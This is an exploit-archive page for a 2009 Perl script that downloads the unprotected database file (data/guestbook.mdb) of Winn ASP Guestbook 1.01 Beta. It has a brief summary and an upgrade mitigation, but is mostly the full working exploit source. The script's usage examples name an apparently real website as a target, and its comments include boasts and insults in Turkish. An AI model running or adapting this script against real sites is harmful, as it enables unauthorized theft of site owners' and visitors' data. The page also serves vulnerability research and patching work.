header-logo
Suggest Exploit
vendor:
Winn ASP Guestbook
by:
ZoRLu
7,5
CVSS
HIGH
Database Disclosure
200
CWE
Product Name: Winn ASP Guestbook
Affected Version From: 1.01 Beta
Affected Version To: 1.01 Beta
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit

This exploit allows an attacker to download the database of Winn ASP Guestbook 1.01 Beta. The exploit is written in Perl and uses LWP::Simple and LWP::UserAgent modules. The exploit takes two arguments, the URL/IP of the target and the path of the application. If the target doesn't have a path, the path argument should be set to '/'.

Mitigation:

Upgrade to the latest version of Winn ASP Guestbook.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#
# Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit
#
# Found By : ZoRLu
# 
# Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com
#
# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz
#
# Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends
#
# Download : http://winn.ws/downloads/asp-guestbook-v1-01.zip



use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit');
system('color 2');


if(@ARGV < 2)
{
print "[-]Exp KullanIm HatasI\n";
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] KullanIm : perl $0 url/IP Path \n";
print "[+] if your target have a path        : perl $0 site.com /path/ \n";
print "[+] example                           : perl $0 lifelinesydney.org /asp-guestbook/ \n";
print "[+] if your target doesnt have a path : perl $0 site.com / \n";
print "[+] example                           : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\*   Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit            *\n";
print "\*             Exploited By : ZoRLu                                      *\n";
print "\*                      msn : trt-turk[at]hotmail.com                    *\n";
print "\*                     Home : yildirimordulari.com , dafgamers.com       *\n";
print "\*                      Dork: Winn ASP Guestbook from Winn.ws            *\n";
print "\*************************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="data/guestbook.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n                        WWW.YiLDiRiMORDULARi.COM\n\n";
print "\n                                   wait!!!      \n\n";

my $useragent = LWP::UserAgent->new();
my $request   = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success) 
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else 
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

# milw0rm.com [2009-05-04]